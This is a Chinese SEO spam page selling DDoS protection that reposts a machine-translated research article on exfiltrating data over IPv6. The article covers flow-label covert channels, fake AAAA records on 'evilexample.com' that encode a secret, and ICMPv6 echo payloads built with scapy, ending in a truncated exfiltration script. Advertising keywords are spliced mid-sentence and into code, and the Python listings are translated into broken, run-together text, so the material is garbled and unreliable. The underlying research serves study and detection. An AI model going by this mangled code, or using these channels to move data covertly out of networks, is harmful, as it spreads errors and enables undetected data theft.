防御ddos_cdn防御系统_免费试用

防御ddos_cdn防御系统_免费试用

测试IPv6的功能以及恶意软件如何利用它

在Aposemat团队中,我们一直在测试IPv6的功能以及恶意软件如何利用它。我们探讨的主题之一是通过IPv6协议过滤数据。在这篇文章中,我们将分享我们对这一主题的研究。

Exfilter是指通过连接到外部目的地和/或使用隐蔽通道,未经授权将敏感数据导出网络。后者通常用于在未被检测到的情况下过滤信息,或避免采取任何措施来阻止数据迁移。关于这个话题已经有很多研究,甚至直到今天,由漏洞导致的数据盗窃仍然是人们关注的焦点。

为了过滤数据,网络层和传输层(如图1所示)与低层一样常用,低层需要进行深入的数据包检查,以发现事件或识别正在发生的渗出。它们还提供数据包头中不常用或不归零的字段和部分数据。这些部分可用于存储部分数据,cc流量攻击如何防御,并可通过分析数据包捕获而不被注意。

图1.OSI模型及其层的描述。第3层和第4层分别以浅橙色和黄色突出显示(来源:Wikipedia)

有几种工具可以通过IPv6网络栈进行过滤。我们将介绍IPv6teal和IPv6DNSExfil,以及如何使用这些工具通过IPv6过滤数据。

第一个工具是IPv6teal,由接收方和发送方(过滤)脚本组成。该工具利用Flow Label字段,该字段用于标记数据包序列,其固定大小为20位(见图2)。它使用这个特定字段,因为它可以是可变的,并且包含自定义位,而不会影响到达其目的地的数据包。此细节为存储数据提供了一个很好的选择,这些数据可以安全到达端点,同时隐藏在正常流量中。

图2.带有流标签字段(标记为红色)的IPv6数据包头结构(来源:维基百科)

为了能够在更少的数据包中容纳更多的数据,作者决定使用GZIP压缩来实现这一点。在我们的测试中,通过internet发送一个包含字符串THISISASECRET的纯文本文件大约需要两秒钟和15个数据包。信息通过一个标志着数据流开始和结束的神奇值进行传输。这些神奇的值还增加了有关传输数据的更多信息。

我们测试的数据包流最终是这样构建的:

数据包构建在两个上层:IPv6层和"原始"层,这只是附加到最后一层的数据。原始层保存前面讨论过的神奇值,并告知接收器何时开始传输,将传输多少位和将传输多少数据包,不计算结束传输的数据包。

另一种过滤技术,在OSI模型的更高级别上,通过DNS AAAA记录完成。AAAA记录设计用于IPv6地址。当客户端请求域的IPv6地址时,网站安全ddos防御报价,它将利用此记录从DNS服务器获取它。虽然TXT记录通常用于此目的,因为它们可以保存人类可读的数据以及机器可读的数据,但对TXT记录的查询不太常见,并且可以在研究网络流时快速捕获。

IPv6DNSExfil等工具利用此技术以伪IPv6地址格式存储机密,在AAAA记录上的短时间内。它将利用nsupdate工具动态创建所述AAAA记录,并将其推送到上游DNS服务器,从而过滤信息。以这种方式创建的记录,使用我们之前使用的相同秘密,将如下所示:

A.evilexample.com。10 AAAA 2000:5448:4953:4953:4153:4543:5245:5400

记录到位后,攻击者可以随心所欲地利用这些数据,可以将其用作C&C(如作者所建议的),也可以通过DNS查询将信息从一个端点传输到另一个端点到特定服务器。

对于Python而言,scapy等库使开发人员更容易与更高级别的网络抽象交互。例如,只需两行代码,我们就可以向IPv6端点发送精心编制的数据包:

%sudo python3Python 3.5.2(默认值,2019年7月10日,11:58:48)[GCC 5.4.0 20160609]关于linuxType的"帮助"、"版权"、"信用"或"许可证"以获取更多信息。>>>>来自scapy。所有导入IPv6,原始,发送>>>发送(IPv6(dst="XXXX:XXX:X:1662:7a8a:20ff:fe43:93d4")/Raw(load="test")。发送1个数据包。

并在另一个端点上嗅探,我们可以看到数据包到达其目的地的额外原始层,其中包括"test"字符串:

#tcpdump-s0-l-X-i eth0'ip6而不是icmp6'tcpdump:verbose输出被抑制,在eth0上使用-v或-vv进行完整协议解码侦听,链路类型EN10MB(以太网),捕获大小262144字节23:47:15.996483 IP6 XXXX:XXX:X:1663::1ce>XXXX:XXX:X:1662:7a8a:20ff:fe43:93d4:无下一个头0x0000:60000004 3b3e XXXX XXXX XXXX 1663`……;>。。。。。。。c 0x0010:0000 0000 0000 01ce XXXX XXXX XXXX 1662…………b 0x0020:7a8a 20ff fe43 93d4 7465 7374 0000 z…………c……测试……

使用相同的方法,我们可以开始使用scapy动态生成流量,而不只是在没有上层传输层的情况下发送数据包。一种情况是使用ICMPv6协议,这是其IPv4协议的改进版本。使用此协议的"经典"过滤方法是使用回音和回复消息(ping6网络工具通常使用)在网络外部发送数据,ddos防御整体方案,而无需建立TCP之类的连接。通过这种方式,我们可以通过ICMPv6 echo请求通过IPv6向嗅探网络的远程主机发送特定的数据块。看看这段代码,例如:

from scapy.all import IPv6,ddos防御方案报价,ICMPv6EchoRequest,sendimport syssecret="THISISASECRET"#存储在packetendpoint=sys.argv[1]#addr中的隐藏信息

我们从哪里发送数据

热门推荐
  • 阿里云高防ip_网站防御cc攻击php源码_如何

      美国的学生贷款危机越来越严重,学生贷款债务超过1.3万亿美元,并且以每秒2700美元的速度增长。贷款人不能忽视债务对个......

    01-08    来源:长虹华伟

    分享
  • 香港高防cdn_cdn高防免费加速_原理

      Autodesk为制造产品的人制造软件。如果您曾经驾驶过高性能汽车,欣赏过高耸的摩天大楼,使用过智能手机,或观看过一部伟......

    02-04    来源:长虹华伟

    分享
  • 高防_网站防御软件_限时优惠

      现在是NCAA®March Madness®的时候了,我们atT和DIRECTV是如何帮助你与大型比赛保持联系的。那些不想错过任何一次运球或扣篮的......

    01-08    来源:长虹华伟

    分享
  • 香港高防ip_ddos流量攻击防御_免费试用

      您是否是一个希望从企业软件中获得更多好处的BlueCat客户?无论您对我们的API感兴趣,还是您想为BlueCat客户社区做出贡献,......

    01-08    来源:长虹华伟

    分享
  • 香港高防服务器_网站安全防护措施有哪些

      创新是当今社会的标志——如果我们能梦想,我们就能做到。在这个时代,云技术和人工智能等新技术的采用正在加速创新的......

    08-24    来源:长虹华伟

    分享
  • 高防IP_防御CC服务器_3天试用

      上周,我们听取了全球专家的意见,讨论了我们从Verizon 2016年数据泄露调查报告中获得的网络应用安全见解。谢谢你,威瑞森......

    02-27    来源:长虹华伟

    分享
  • ddos盾_菲律宾高防服务器_原理

      了解有关360 Total Security的更多信息近日,360安全中心发现了一种传播活跃的木马"browserhickerdriver",两天内感染了十几万台电脑......

    06-16    来源:长虹华伟

    分享
  • 高防cdn_陕西高防服务器_精准

      行业新闻2015年3月12日星期四下午犯罪分子利用苹果支付进行欺诈;银行提高身份验证安全性苹果支付没有被黑客入侵。但它......

    06-08    来源:长虹华伟

    分享
  • 高防IP_高防云虚拟主机_如何防

      阅读时间:5分钟2018年前几周,网络犯罪分子针对5所大学、23家私营公司和数家政府机构。尽管攻击者使用了新的、复杂的恶......

    06-09    来源:长虹华伟

    分享
  • 高防ddos_高防ip服务器_解决方案

      作为网络钓鱼和鱼叉式网络钓鱼攻击的一部分,社会工程的成功使组织意识到他们需要一种有效的策略来提高员工的警惕。在......

    09-04    来源:长虹华伟

    分享
返回列表
Ctrl+D 将本页面保存为书签,全面了解最新资讯,方便快捷。